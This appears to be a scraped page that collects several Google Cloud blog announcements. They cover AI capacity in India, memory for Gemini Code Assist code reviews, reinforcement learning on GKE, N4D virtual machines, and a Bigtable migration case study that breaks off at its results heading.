gcp

2025 11 11

GCP – Supporting Viksit Bharat: Announcing our newest AI investments in India

India’s developer community, vibrant startup ecosystem, and leading enterprises are embracing AI with incredible speed. To meet this moment, we are investing in powerful, locally available tools that can help foster a diverse ecosystem, and ensuring our platform delivers the controls you need for compliance and AI sovereignty.

Today, we’re announcing a significant expansion of our local AI hardware capacity for customers in India. This increase in local compute, powered by Google’s AI Hypercomputer architecture with the latest Trillium TPUs, will help more businesses and public sector organizations train and serve their most advanced Gemini models in India.

This local capacity unlocks new opportunities for high-performance, low-latency AI applications while helping customers meet India’s data residency and sovereignty requirements.

Enabling models and control: AI tools built for India’s context

While infrastructure is the foundation for digital sovereignty, it also requires control over the data and the models built on it. We’re committed to bringing our latest AI advancements to India faster than ever, with the controls you need.

Our new services will enable you to build, tune, and deploy models that understand India’s unique business logic and rich cultural context.

Next-generation models, here in India: Earlier this year, Google Cloud made Gemini available to regulated Indian customers by deploying Gemini 2.5 Flash with local machine-learning processing support. Now, we’re opening early testing for our latest and most advanced Gemini models to Indian customers. We’re also committing to launching the most powerful Gemini models in India with full data residency support. This is a first for Google Cloud, and a direct response to help meet the needs of our Indian customers.
More AI capabilities, available locally: We’re providing additional consumption models and pre-built AI-powered applications tailored for local context by launching a suite of new capabilities with data residency support in India:

Batch support for Gemini 2.5 Flash: Now generally available, this allows organizations to run high-volume, non-real-time AI tasks at a lower cost, all in India.
Document AI: Now in preview, we’re providing local support to help Indian businesses automate document processing.

More local context in your AI: Grounding on Google Maps is a new capability to ground model responses in real time from Google Maps, ensuring AI applications can provide accurate, location-aware answers.

A sovereign AI ecosystem: Building for India, with India

The most durable and decisive factor for long-term digital sovereignty lies in cultivating the “human element” — the skilled talent and innovation ecosystem. A sovereign AI future depends on building a strong local ecosystem.

Our strategy is to support India’s ecosystem-led approach by investing in the researchers, developers, and startups who are building for India’s specific needs.

Collaboration with IIT Madras: Google Cloud and Google DeepMind are thrilled to collaborate with IIT Madras to support the launch of Indic Arena. Run independently by the renowned AI4Bharat center at IIT Madras, this platform will allow users from all over India to anonymously evaluate and rank AI models on tasks unique to India’s rich multilingual landscape. To support this initiative, we are providing cloud credits to power this critical, community-driven resource.

“At AI4Bharat, our mission is to build AI for India’s specific needs. A critical part of this is having a neutral, standardized benchmark to understand how models are performing across our many languages,” said Mitesh Khapra, associate professor, IIT Madras. “Indic Arena will be that platform. We are delighted to have Google Cloud’s support to provide the initial compute power to bring this independent, public-facing project to life for the entire Indian AI community.”

We encourage all developers, researchers, and organizations in India to explore the Indic Arena platform and contribute to building a more inclusive AI future.

We invite the entire Indian ecosystem, from startups and universities to government bodies and enterprises, to take advantage of this new, dedicated capacity for Gemini in Vertex AI and our sovereign-ready infrastructure to build the next generation of AI that is built by Indians, for Indians.

Read More for the details.

2025 11 10

GCP – Achieve better AI-powered code reviews using new memory capabilities on Gemini Code Assist

Tibor Kiss Cloud, Google Cloud gcp

The best feedback during a code review is specific, consistent, and understands the history of a project.

However, AI code review agents today are often stateless; they have no memory of past interactions. This means you might see the same feedback on new pull requests that you’ve already rejected, because the agent can’t learn from your team’s guidance. The result is frustration and repeated work.

Today, we’re releasing a new memory capability for Gemini Code Assist on GitHub for both enterprises and individual developers. Now, you can create a dynamic, evolving memory of your team’s coding standards, style, and best practices, all derived from your direct interactions and feedback within pull requests. The memory is stored securely in a Google-managed project specific to your installation, isolating it from other users.

Here’s how memory works

Memory transforms the code review agent from a stateless tool into a long-term project contributor that learns and adapts to your team.

Automated vs. manual memory

Gemini Code Assist on GitHub already supports memory in the form of styleguide.md files. These rules are always added to the agent’s prompt, which makes them suitable for static, universal guidelines.

In contrast, persistent memory introduces a more dynamic and automated approach. It automatically extracts rules from pull request interactions, requiring no manual effort. These learned rules are stored efficiently and are only retrieved and applied when they are relevant to the specific code being reviewed. This creates a smarter, more scalable memory that adapts to your team.

The process is built on three key pillars:

1. It learns from your interactions

The process begins when you and your team do what you already do today: conduct code reviews. When a pull request is merged, Gemini Code Assist on GitHub analyzes the comment threads for feedback. For instance, if Gemini Code Assist on GitHub suggests “do not line-wrap import statements” in a .java file and the author disagrees in their reply, the agent treats this interaction as a valuable piece of feedback and stores it. By waiting until a PR is merged, we ensure the conversation is complete and the code is a valuable source of truth.

2. It intelligently creates, updates and stores rules

From that simple interaction, persistent memory uses the powerful Gemini model to infer a generalized, reusable rule. In the example above, it would generate a natural language rule like: “In Java, import statements could be line-wrapped”.

3. It applies rules to future reviews

Once rules are stored in memory, the agent uses them in two critical ways:

To guide the initial review: Before it even begins analyzing a new pull request, the agent will query the persistent memory for a broad set of relevant rules for the repository. This helps shape its initial analysis to be more in line with your team’s established patterns.
To filter its own suggestions: After generating a set of draft review comments, the agent performs a second check. It retrieves highly specific rules related to its own comments and evaluates them. This acts as a filter to ensure its suggestions don’t violate a previously learned best practice, allowing it to drop or modify comments before you ever see them.
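The two uses above can be sketched as a pair of lookups against a rule store. This is a minimal illustration only, not how Gemini Code Assist is implemented: the `Rule` and `DraftComment` types, the `topic` tags, and the matching by file extension are all hypothetical stand-ins for whatever retrieval the real agent performs.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    text: str        # natural-language rule learned from a merged PR
    language: str    # file type the rule applies to, e.g. "java" (hypothetical field)
    topic: str       # coarse topic tag, e.g. "imports" (hypothetical field)
    allows: bool     # True if the team accepts the pattern the rule describes


@dataclass(frozen=True)
class DraftComment:
    path: str
    topic: str
    body: str


def language_of(path):
    """Use the file extension as a crude language key."""
    return path.rsplit(".", 1)[-1].lower() if "." in path else ""


def rules_for_review(memory, changed_paths):
    """Stage 1: broad retrieval of every rule matching a changed file's language."""
    languages = {language_of(p) for p in changed_paths}
    return [rule for rule in memory if rule.language in languages]


def filter_comments(memory, drafts):
    """Stage 2: drop draft comments that contradict a specific learned rule."""
    kept = []
    for comment in drafts:
        contradicted = any(
            rule.allows
            and rule.language == language_of(comment.path)
            and rule.topic == comment.topic
            for rule in memory
        )
        if not contradicted:
            kept.append(comment)
    return kept


memory = [Rule("In Java, import statements could be line-wrapped", "java", "imports", True)]
drafts = [
    DraftComment("src/App.java", "imports", "Do not line-wrap import statements"),
    DraftComment("src/App.java", "naming", "Use a more descriptive variable name"),
]
for comment in filter_comments(memory, drafts):
    print(comment.body)
```

In this sketch the import-wrapping comment is dropped before anyone sees it, because the learned rule says the team accepts that pattern; the unrelated naming comment passes through.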

As more rules are accrued, the team’s tribal knowledge is shared across the codebase through code reviews.

Getting started

New to the app?

If you are an individual developer or OSS maintainer, install Gemini Code Assist on GitHub from the GitHub Marketplace.
If you are an enterprise customer, onboard through the Google Cloud Console. Review our documentation to learn more about the setup and using the Code Review capability. See this video for a walkthrough of the process.

Already have the app installed?

If you are an individual developer or OSS maintainer, enable this feature in the Gemini Code Assist on GitHub admin panel.
If you are an enterprise customer, enable this feature in the Google Cloud Console.


2025 11 10

GCP – Running high-scale reinforcement learning (RL) for LLMs on GKE

Tibor Kiss Cloud, Google Cloud gcp

As Large Language Models (LLMs) evolve, Reinforcement Learning (RL) is becoming the crucial technique for aligning powerful models with human preferences and complex task objectives.

However, enterprises that need to implement and scale RL for LLMs face infrastructure challenges. The primary hurdles include memory contention from concurrently hosting multiple large models (such as the actor, critic, reward, and reference models) and iterative switching between high-latency inference generation and high-throughput training phases.

This blog details Google Cloud’s full-stack, integrated approach, from custom TPU hardware to the GKE orchestration layer, and shares how you can meet the hybrid, high-stakes demands of RL at scale.

A quick primer: Reinforcement Learning (RL) for LLMs

RL is a continuous feedback loop that combines elements of both training and inference. At a high level, the RL loop for LLMs functions as follows:

The LLM generates a response to a given prompt.
A “reward model” (often trained on human preferences) assigns a quantitative score, or reward, to the output.
An RL algorithm (e.g., DPO, GRPO) uses this reward signal to update the LLM’s parameters, adjusting its policy to generate higher-rewarding outputs in subsequent interactions.

This cycle of generation, evaluation, and optimization continually improves the LLM’s performance against predefined objectives.
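The loop above can be sketched in a few lines. This is a simplified illustration, assuming GRPO-style group-relative advantages (each reward normalized against the other responses sampled for the same prompt); the `generate`, `score`, and `update` callables are hypothetical placeholders for the sampler, reward model, and optimizer, and real implementations differ in details such as which standard deviation they use.

```python
import statistics


def group_relative_advantages(rewards, eps=1e-6):
    """Normalize each reward against its own group: (r - mean) / (std + eps).

    Uses the population standard deviation; eps avoids division by zero
    when every response in the group receives the same reward.
    """
    mean = statistics.fmean(rewards)
    std = statistics.pstdev(rewards)
    return [(r - mean) / (std + eps) for r in rewards]


def rl_step(prompt, generate, score, update, group_size=4):
    """One pass through the loop: generate, evaluate, then optimize."""
    # 1. The LLM generates several candidate responses for the prompt.
    responses = [generate(prompt) for _ in range(group_size)]
    # 2. The reward model assigns a scalar score to each response.
    rewards = [score(prompt, response) for response in responses]
    # 3. The RL algorithm turns rewards into a learning signal and updates the policy.
    advantages = group_relative_advantages(rewards)
    update(prompt, responses, advantages)
    return rewards, advantages
```

Steps 1 and 2 are inference-shaped work and step 3 is training-shaped work, which is why the same job alternates between the two kinds of load.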

RL workloads are hybrid and cyclical. The main goal of RL is neither to minimize error (as in training) nor to predict quickly (as in inference), but to maximize reward through iterative interaction. The primary constraint for an RL workload is not just computational power but also system-wide efficiency: specifically, minimizing aggregate sampler latency and maximizing the speed of weight copying to keep end-to-end step time low.

Google Cloud’s full-stack approach to RL

Solving these system-wide challenges requires an integrated approach. You can’t just have fast hardware or a good orchestrator; you need every layer of the stack to work together. Here is how our full-stack approach is built to solve the specific demands of RL:

1. Flexible, high-performance compute (TPUs and GPUs): Instead of locking customers into one path, we provide two high-performance options. Our TPU stack is a vertically integrated, JAX-native solution where our custom hardware (excelling at matrix operations) is co-designed with our post-training libraries (MaxText and Tunix). In parallel, we fully support the NVIDIA GPU ecosystem, partnering with NVIDIA on optimized NeMo RL recipes so customers can leverage their existing expertise directly on GKE.

2. Holistic, full-stack optimization: We integrate optimization from the bare metal up. This includes our custom TPU accelerators, high-throughput storage (Managed Lustre, Google Cloud Storage), and — critically — the orchestration and scheduling that GKE provides. By optimizing the entire stack, we can attack the system-wide latencies that bottleneck hybrid RL workloads.

3. Leadership in open-source: RL infrastructure is complex and built on a wide range of tools. Our leadership starts with open-sourcing Kubernetes and extends to active partnerships with orchestrators like Ray. We contribute to key projects like vLLM, develop open-source solutions like llm-d for cost-effective serving, and open-source our own high-performance MaxText and Tunix libraries. This helps ensure you can integrate the best tools for the job, not just the ones from a single vendor.

4. Proven, mega-scale orchestration: Post-training RL can require compute resources that rival pre-training. This requires an orchestration layer that can manage massive, distributed jobs as a single unit. GKE AI mega-clusters support up to 65,000 nodes today, and we are heavily investing in multi-cluster solutions like MultiKueue to scale RL workloads beyond the limits of a single cluster.

Running RL workloads on GKE

Existing GKE infrastructure is well-suited for demanding RL workloads and provides several infrastructure-level efficiencies.

The image below outlines the architecture and key recommendations for implementing RL at scale.

Figure: GKE infrastructure for running RL

At the base, the infrastructure layer provides the foundational hardware, including supported compute types (CPUs, GPUs, and TPUs). You can use the Run:ai model streamer to accelerate model streaming for all three compute types. High-performance storage (Managed Lustre, Cloud Storage) covers the storage needs of RL workloads.

The middle layer is the managed K8s layer powered by GKE, which handles the resource orchestration, resource obtainability using Spot or Dynamic Workload Scheduler, autoscaling, placement, job queuing and job scheduling and more at mega scale.

Finally, the open frameworks layer runs on top of GKE, providing the application and execution environment. This includes managed support for open-source tools such as KubeRay and Slurm, and the gVisor sandbox for secure, isolated task execution.

Building RL workflow

Before creating an RL workload, you must first identify a clear use case. With that objective defined, you then architect the core components: selecting the algorithm (e.g., DPO, GRPO), the model server (like vLLM or SGLang), the target GPU/TPU hardware, and other critical configurations.

Next, you can provision a GKE cluster configured with Workload Identity, GCS FUSE, and DCGM metrics. For robust batch processing, install the Kueue and JobSet APIs. We recommend deploying Ray as the orchestrator on top of this GKE stack. From there, you can launch the NeMo RL container, configure it for your GRPO job, and begin monitoring its execution. For the detailed implementation steps and source code, please refer to this repository.
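As a rough illustration of the Kueue piece of that setup, the sketch below builds a plain Kubernetes Job manifest that Kueue could admit from a queue. It is not the recipe from the referenced repository, and it uses a plain Job rather than the Ray-based deployment recommended above: the job name, queue name, and image are hypothetical placeholders, and the only Kueue-specific parts are the `kueue.x-k8s.io/queue-name` label and creating the Job suspended so that Kueue decides when it starts.

```python
import json


def kueue_job_manifest(name, queue_name, image, gpus_per_pod, parallelism):
    """Build a batch/v1 Job that is handed to a Kueue LocalQueue for admission."""
    return {
        "apiVersion": "batch/v1",
        "kind": "Job",
        "metadata": {
            "name": name,
            # Kueue picks up Jobs that carry this label.
            "labels": {"kueue.x-k8s.io/queue-name": queue_name},
        },
        "spec": {
            # Created suspended; Kueue unsuspends the Job once quota is available.
            "suspend": True,
            "parallelism": parallelism,
            "completions": parallelism,
            "template": {
                "spec": {
                    "restartPolicy": "Never",
                    "containers": [
                        {
                            "name": "trainer",
                            "image": image,
                            "resources": {"limits": {"nvidia.com/gpu": gpus_per_pod}},
                        }
                    ],
                }
            },
        },
    }


manifest = kueue_job_manifest(
    name="grpo-demo",                         # hypothetical job name
    queue_name="rl-queue",                    # hypothetical LocalQueue name
    image="example.invalid/rl-trainer:tag",   # placeholder image, not a real one
    gpus_per_pod=8,
    parallelism=2,
)
print(json.dumps(manifest, indent=2))
```

The printed JSON can be saved to a file and applied like any other manifest, since Kubernetes accepts JSON as well as YAML.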

Getting started with RL

Run RL on TPUs or GPUs: Try the RL recipe on TPUs using MaxText and Pathways for the GRPO algorithm, or if you use GPUs, try the NeMo RL recipes.
Partner with the open-source ecosystem: Our leadership in AI is built on open standards like Kubernetes, llm-d, Ray, MaxText, and Tunix. We invite you to partner with us to build the future of AI together. Come contribute to llm-d! Join the llm-d community, check out the repository on GitHub, and help us define the future of open-source LLM serving.


2025 11 10

GCP – N4D now GA: Gain up to 3.5x price-performance for scale-out workloads

Tibor Kiss Cloud, Google Cloud gcp

In today’s competitive environment, IT leaders are faced with supporting application scale, rolling out more features, and enabling high-bar customer experiences. This creates a direct and complex challenge: finding the right balance between performance and total cost of ownership (TCO) for the general-purpose workloads that power everyday business operations.

Today, we are announcing the general availability of the N4D machine series, the latest addition to Google Compute Engine’s cost-optimized, general-purpose portfolio. Addressing a wide range of workloads, such as web and application servers, data analytics platforms, and containerized microservices, N4D provides a flexible and price-performant solution.

The N4D machine series combines Google’s Titanium infrastructure with 5th Gen AMD EPYC™ “Turin” processors, delivering up to 3.5x the throughput for web-serving workloads vs. the previous-generation N2D. N4D offers predefined shapes of up to 96 vCPUs and 768 GB of DDR5 memory, up to 50 Gbps of networking bandwidth, and Hyperdisk Balanced and Throughput storage. To deliver blended cost savings, N4D allows you to move beyond rigid instance sizing for both compute and storage, with Custom Machine Types to independently configure the exact number of vCPUs and amount of memory, complemented by Hyperdisk for tuning disk storage performance and capacity. For the most demanding general-purpose workloads, pair N4D with the consistently high performance of C4D.

Google Cloud provides workload-optimized infrastructure to ensure the right resources are available for every task. Titanium in particular, with its multi-tier offloads and security capabilities, is foundational to that infrastructure. Titanium offloads networking and storage processing to free up the CPU, and its dedicated SmartNIC manages all I/O, ensuring the AMD EPYC cores are reserved exclusively for your application. Titanium is part of Google Cloud’s vertically integrated stack — from the custom silicon in our servers to our planet-scale network traversing 7.75 million kilometers of terrestrial and subsea fiber across 42 regions — that is engineered to maximize efficiency and provide the ultra-low latency and high bandwidth to customers at global scale.

A new standard for price-performance

N4D machine series doesn’t just inch past the previous N2D generation; it sprints, delivering up to 50% higher price-performance for general computing workloads and up to 70% better price-performance for Java workloads. For web-serving workloads, N4D leverages Titanium and AMD’s Turin processors to drive incredible throughput. This results in up to 3.5x the price-performance vs N2D, driving faster response times and a better overall experience for your end-users.

As of October 2025. Performance based on the estimated SPECrate®2017_int_base, estimated SPECjbb2015, and Google internal Nginx Reverse Proxy benchmark scores run in production. Price-performance claims based on published and estimated list prices for Google Cloud.

“Our edge proxy fleet and internal data pipelines observed a 3-4x performance improvement on Google Cloud’s N4D instances compared to N2D. Our benchmarks also show N4D processes the same workload with significantly greater consistency while using just a fraction of the CPU. This leap in price-performance allows us to efficiently scale our general-purpose workloads, and fits neatly in our fleet alongside more specific Google compute products we leverage.” – Matt Schallert, Member of Technical Staff, Chronosphere

“A 10% increase in throughput while cutting costs by up to 50% is a massive win for TCO optimization. That’s what we achieved on Google Cloud’s N4D machine series. For MediaGo, this efficiency is critical. It allows our AI-driven advertising platform to scale more cost-effectively, directly supporting our mission to maximize ROI for our global partners.” – MediaGo

“The move from N2D to N4D is a significant generational leap. This 144.14% performance uplift over 152 tests is a testament to Google’s Titanium, unlocking the full potential of the new AMD EPYC ‘Turin’ processors. For those looking for the best possible price-performance in Google Cloud, the N4D instances are a clear winner.” – Michael Larabel, Founder and Principal Author, Phoronix (Read the full study here.)

“With the launch of the new N4D instances, Google Cloud now offers the most comprehensive portfolio based on our 5th Gen AMD EPYC processors, marking a significant milestone in our strategic partnership. N4D machine series combines the leading performance of AMD CPUs with the uniqueness of Google’s Custom Machine Types to deliver a remarkable uplift in price-performance, flexibility, and cost-optimization for everyday workloads. Our benchmark tests confirm this, showing measured performance gains of up to 75% over the previous generation N2D machine series for media encode and transcode workloads.” – Ryan Rodman, Sr Director, Cloud Business Group, AMD

Complementing C4D machine series

Earlier this year, we introduced our general-purpose C4D machine series built on the same underlying processor as N4D. Its consistently high performance and enterprise features like advanced maintenance support, larger shapes, and our next-gen Titanium Local SSDs, make C4D a great fit for critical workloads. In fact, customers such as Silk and Chess.com report greater than 40% improvement in performance with C4D over prior generations.

But critical applications are only part of the story. A modern cloud architecture must also run countless general-purpose workloads where flexibility and price-performance are key. That’s why we designed N4D — as a complement to C4D. By leveraging C4D and N4D in tandem, you unlock the full spectrum of enterprise features, performance, flexibility, and cost-optimization, choosing:

C4D for consistent performance: This is your solution for the most demanding, latency-sensitive applications. With up to 200 Gbps networking, Local SSD support along with larger shapes up to 384 vCPUs and bare metal options, C4D delivers predictable, high-end performance for large databases, high-traffic ad and game servers, and demanding AI/ML inference workloads.
N4D for flexible cost-optimization: This is the engine for the vast majority of your general-purpose workloads. N4D’s leading price-performance, low cost, and flexibility allow you to slash TCO for applications like web servers, microservices, and development environments.

This approach is already delivering real-world results, allowing customers like Verve to optimize their business from both ends.

“With Google’s Gen4 AMD portfolio, we can optimize for both revenue and cost simultaneously. C4D provides the consistent peak performance we need for our core ad servers — 81% faster than C3D — which directly translates to more revenue from higher fill-rates (successful bid/ask matching). Meanwhile, N4D delivers an incredible 2x performance and price-performance over N2D for everyday workloads, including scale-out microservices with GKE, enabling us to grow while slashing our overall TCO. This ‘Better Together’ strategy allows us to use the consistently peak performance of C4D for our mission-critical services and the flexible, cost-efficient N4D to aggressively reduce TCO everywhere else — a level of optimization that simply isn’t possible with a single VM type elsewhere.” – Pablo Loschi, Principal Systems Engineer at Verve

The Custom Machine Type and Hyperdisk advantage

Custom Machine Types are a key differentiator for Google Cloud, letting you go beyond predefined “T-shirt sizes”. Instead of forcing your workload into a box, you can tailor the infrastructure to fit your workload’s needs, saving on cost. For instance, a memory-intensive workload requiring 16 vCPUs and 70 GB of RAM might typically be placed on a predefined N4D-highmem-16 shape, forcing you to pay for unused resources. With CMTs, you provision the exact 16 vCPU and 70 GB configuration, eliminating that waste and achieving up to 17% cost savings.
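The arithmetic behind that comparison can be sketched as follows. The unit prices here are made-up placeholders, not Google Cloud list prices, and the 128 GB figure for the predefined highmem shape assumes 8 GB of memory per vCPU; with real prices the result will differ from this sketch and may not match the figure quoted above. The `custom_premium` parameter is likewise a hypothetical knob for any pricing difference between custom and predefined shapes.

```python
def hourly_cost(vcpus, memory_gb, vcpu_price, gb_price, premium=0.0):
    """Cost of a shape priced per vCPU and per GB of memory, plus an optional premium."""
    base = vcpus * vcpu_price + memory_gb * gb_price
    return base * (1.0 + premium)


def savings_fraction(predefined, custom, vcpu_price, gb_price, custom_premium=0.0):
    """Fraction saved by the custom shape relative to the predefined shape."""
    predefined_cost = hourly_cost(*predefined, vcpu_price, gb_price)
    custom_cost = hourly_cost(*custom, vcpu_price, gb_price, premium=custom_premium)
    return (predefined_cost - custom_cost) / predefined_cost


# Hypothetical unit prices, for illustration only.
VCPU_PRICE = 0.03   # per vCPU-hour (placeholder)
GB_PRICE = 0.004    # per GB-hour (placeholder)

saving = savings_fraction(
    predefined=(16, 128),   # assumed memory size of the predefined highmem shape
    custom=(16, 70),        # the exact configuration the workload needs
    vcpu_price=VCPU_PRICE,
    gb_price=GB_PRICE,
)
print(f"Illustrative saving: {saving:.1%}")
```

The point of the sketch is the structure of the calculation: the saving comes entirely from the 58 GB of memory that the workload would otherwise pay for without using.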

With shapes of up to 96 vCPUs and 768 GB of DDR5 memory, the combination of Custom Machine Types and N4D lets you dial in the exact resources you need with flexible vCPU-to-memory ratios along with extended memory support.

“At Symbotic, our vision is to revolutionize the global supply chain with an AI-powered robotics platform built for scale and efficiency. This demands an infrastructure that is both powerful and scalable. Google Cloud’s N4D VMs, powered by AMD’s latest EPYC processors, delivered exactly that. We observed a significant 40% performance uplift compared to the previous N2D generation, allowing us to cut our CPU footprint in half with no change in simulation speed or fidelity. The ability to pair these gains with Custom Machine Types — a capability unique to Google Cloud — is a game-changer. It allows us to precisely sculpt our infrastructure to our workloads and gain a significant TCO advantage versus other cloud offerings.” – Dan Inbar, Chief Information Officer, Symbotic

This granular control and TCO advantage extends beyond compute to your storage. Just as Custom Machine Types let you break free from fixed vCPU-to-memory ratios, Hyperdisk unbundles storage performance from capacity, letting you independently tune capacity and performance to precisely match your workload’s block storage requirements.

This is further enhanced by Hyperdisk Storage Pools for Hyperdisk Balanced volumes, which let you provision performance and capacity in aggregate, rather than managing each volume individually. The result is simpler management, higher efficiency, and an easier path for modernizing SAN workloads, all while helping you lower your storage TCO by as much as 30-50%.

Get started with N4D today

Adopting the latest N4D VM series is easy, particularly if you use Google Kubernetes Engine (GKE), where our custom compute classes remove the operational hurdles of migrating workloads to new hardware. Just add N4D to your prioritized list of VM types to ensure your workloads have the performance and flexibility they need to scale.

N4D is now available in us-central1 (Iowa), us-east1 (South Carolina), us-west1 (Oregon), us-west4 (Las Vegas), europe-west1 (Belgium), and europe-west4 (Netherlands).

Check for the latest availability on our Regions and Zones page and deploy your first instance today in the Google Cloud console or with GKE. Learn more about N4D in the documentation.

1. 9xx5C-044 – Testing by AMD Performance Labs as of 10/21/2025. N4D-standard-16 score comparison to N2D-standard-16 running FFmpeg v6.1.1 benchmark (average of 2x encode and 2x transcode) on Ubuntu 24.04 LTS OS with 6.8.0-1021-gcp kernel, SMT On.

Performance uplift (normalized to N2D):

Ffmpeg_raw_vp9: 1.76
Ffmpeg_h264_vp9: 1.76
Ffmpeg_raw_h264: 1.71
Ffmpeg_vp9_h264: 1.76
FFmpeg average: 1.75

Cloud performance results presented are based on the test date in the configuration. Results may vary due to changes to the underlying configuration, and other conditions such as the placement of the VM and its resources, optimizations by the cloud service provider, accessed cloud regions, co-tenants, and the types of other workloads exercised at the same time on the system.


2025 11 10

GCP – Zeotap’s big win: 46% TCO reduction and enhanced real-time performance with Bigtable

Tibor Kiss Cloud, Google Cloud gcp

In today’s fast-paced, data-driven landscape, the ability to process, analyze, and act on vast amounts of data in real time is paramount. For businesses aiming to deliver personalized customer experiences and optimize operations, the choice of database technology is a critical decision.

At Zeotap, a leading Customer Data Platform (CDP), we empower enterprises to unify their data from disparate sources to build a comprehensive view of their customers. This enables businesses to activate data across various channels for marketing, customer support, and analytics. Zeotap handles more than 10 billion new data points a day from more than 500 data sources across our clients, while orchestrating more than 2,000 workflows, one-third of them in real time with millisecond latency. Performance is crucial to meeting our stringent SLAs for data freshness and end-to-end latency.

However, as Zeotap grew, our ScyllaDB-based infrastructure faced scaling challenges, especially as the business needed to evolve towards real-time use cases and increasingly spiky workloads. We needed a more flexible, performant, cost-effective, and operationally efficient solution, which led us to Bigtable, a low-latency, NoSQL database service from Google Cloud for machine learning, operational analytics, and high-throughput applications. The migration resulted in significant benefits, including a 46% reduction in Total Cost of Ownership (TCO).

The challenge of scaling real-time analytics

Zeotap’s platform demands a database capable of handling a high write throughput of over 300,000 writes per second and nearly triple that in reads during peaks.

As our platform evolved, the initial architecture presented several hurdles:

Scalability limitations: We initially self-managed ScyllaDB on-premises and later in the cloud. We used Spark and BigQuery for analytical batch processing, but managing these different tools and pipelines across our own environment and customer environments reached a point where scaling became increasingly difficult.
Operational overhead: Managing and scaling our previous database infrastructure required significant operational effort. We had to run scripts in the background to add nodes when resource alerts came up and had to map hardware to different kinds of workloads.
Deployment complexity: Embedding third-party technology in our stack complicated deployment. The commercial procurement process was also cumbersome.
Cost predictability: Ensuring predictable costs for us and our clients was a growing concern as our business grew.

These challenges drove us to re-evaluate our data infrastructure and seek a cloud-native solution that could meet our streaming-first, “zero-touch” ops philosophy while supporting our demanding OLAP and OLTP workloads.

Why Bigtable? Performance, scalability, and efficiency

Zeotap’s decision to migrate to Bigtable was driven by five key requirements:

Operational simplicity: Moving from a ScyllaDB cluster to Bigtable meant eliminating a significant operational burden and achieving “zero-touch ops”. Bigtable abstracts away hardware mapping and node management. This eliminates the need for maintenance windows and takes care of data rebalancing.
Performance: Zeotap needed predictable performance, even with highly unpredictable workloads, to meet our stringent SLAs. Bigtable’s ability to deliver low latencies for both reads and writes at scale was crucial, especially with spiky traffic patterns.
Efficient scalability: Managing ScyllaDB cluster scaling, rebalancing, and hotspots was operationally intensive. Zeotap handles very spiky and bursty workloads, at times exceeding 300,000 writes per second. Bigtable disaggregates compute and storage, allowing for rapid scaling, and autoscaling automatically adjusts cluster size in response to demand. This led to greater cost efficiency and helped eliminate idle resources.
Total cost of ownership (TCO): A significant driver of this migration was the need for cost efficiency and predictability. By moving from ScyllaDB to Bigtable, we achieved a significant 46% reduction in our TCO. This stems from Bigtable’s efficient storage and the ability to combine use cases, such as using Bigtable as a hot store and BigQuery as a warm store.
Tight integration: Bigtable’s integration with other Google Cloud services, particularly BigQuery, was a major advantage in reducing operational overhead. Features like reverse ETL directly into Bigtable greatly simplify data pipelines and reduce Zeotap’s operational footprint by 20%.


Zeotap’s architectural evolution to cloud-native

Zeotap’s transition to Bigtable wasn’t an overnight lift-and-shift, but part of a strategic plan to build a streaming real-time analytics platform that could meet the needs of an ever more demanding customer landscape:

2020: After running one of the largest graphs with JanusGraph-on-ScyllaDB and a heavy processing operation with Spark on AWS, we made the strategic move to migrate to Google Cloud.
2022: Adopted a Lambda architecture, pivoting heavily to BigQuery and moving away from graph due to performance issues. ScyllaDB was now acting as a pure key-value store.
2023: Shifted to a Kappa architecture, prioritizing real-time ingestion and streaming. This was a major network redesign to meet the needs of clients for real-time use cases.
2024: Fully committed to a cloud-native model with Bigtable and BigQuery at its core, while eliminating Spark from our stack.

In our current architecture, Zeotap’s ingestion layer runs via Dataflow and a home-grown streaming engine, with a combination of Memorystore and Bigtable powering inline enrichment, transformation, and ingestion. We use Memorystore as a lightning-fast cache layer to speed up read-heavy workloads while reducing strain on Bigtable. Bigtable serves as the hot store for real-time ingestion and backs the data API for low-latency point lookups, while BigQuery acts as the warm and cold store for analytics, inferencing, and batch processing.
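The read path described above can be sketched as a cache-aside lookup. This is a minimal illustration under stated assumptions, not Zeotap’s implementation: the `ProfileStore` class is hypothetical, and plain dictionaries stand in for Memorystore and Bigtable.

```python
from typing import Optional


class ProfileStore:
    """Cache-aside reads: try the cache first, fall back to the hot store."""

    def __init__(self) -> None:
        # Plain dicts stand in for Memorystore (cache) and Bigtable (hot store).
        self.cache: dict[str, dict] = {}
        self.hot_store: dict[str, dict] = {}
        self.hot_store_reads = 0  # counts how often the cache was bypassed

    def write(self, key: str, profile: dict) -> None:
        # Write to the hot store and invalidate any stale cached copy.
        self.hot_store[key] = profile
        self.cache.pop(key, None)

    def read(self, key: str) -> Optional[dict]:
        if key in self.cache:
            return self.cache[key]
        self.hot_store_reads += 1
        profile = self.hot_store.get(key)
        if profile is not None:
            self.cache[key] = profile  # populate the cache for later reads
        return profile
```

Repeated reads of the same key reach the hot store only once, which is the effect the cache layer is meant to have on read-heavy workloads.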

This architectural transformation, with Bigtable at its heart, enables us to:

Consolidate fragmented data: Bigtable handles the complex multi-read/write operations required to build single customer views. The data comes from hundreds of different channels, including ERP, CRM, web apps, and data warehouses, and carries different types of IDs that need to be stitched together as they are consolidated into Bigtable.
Deliver real-time customer 360: The platform serves comprehensive customer profiles, including identities, attributes, streaming events, calculated attributes, and consent data, all through our Bigtable-backed data API. This makes the same unified assets available across the entire customer lifecycle, empowering customer support, marketers, and data analysts alike.
Optimize AI pipelines: Pairing Bigtable as a feature store with BigQuery as our inferencing platform (using BQML) has dramatically shortened our time to market for AI model deployment for clients, from multiple weeks to less than a week.
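The ID stitching mentioned in the first item can be illustrated with a union-find structure, in which identifiers that have been observed together collapse into one profile. This is a sketch of one common technique, not a description of Zeotap’s actual method; the `IdentityGraph` class and the identifier formats are hypothetical.

```python
class IdentityGraph:
    """Union-find over identifiers; linked identifiers share one profile root."""

    def __init__(self) -> None:
        self.parent: dict[str, str] = {}

    def find(self, identifier: str) -> str:
        # Unknown identifiers start as their own root.
        self.parent.setdefault(identifier, identifier)
        root = identifier
        while self.parent[root] != root:
            root = self.parent[root]
        # Path compression: point every visited node straight at the root.
        while self.parent[identifier] != root:
            self.parent[identifier], identifier = root, self.parent[identifier]
        return root

    def link(self, a: str, b: str) -> None:
        # Record that two identifiers belong to the same customer.
        root_a, root_b = self.find(a), self.find(b)
        if root_a != root_b:
            self.parent[root_b] = root_a
```

For example, linking an email to a CRM ID and a cookie to the same CRM ID places all three under one root, which could then serve as the key for the consolidated profile.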

Results and looking forward

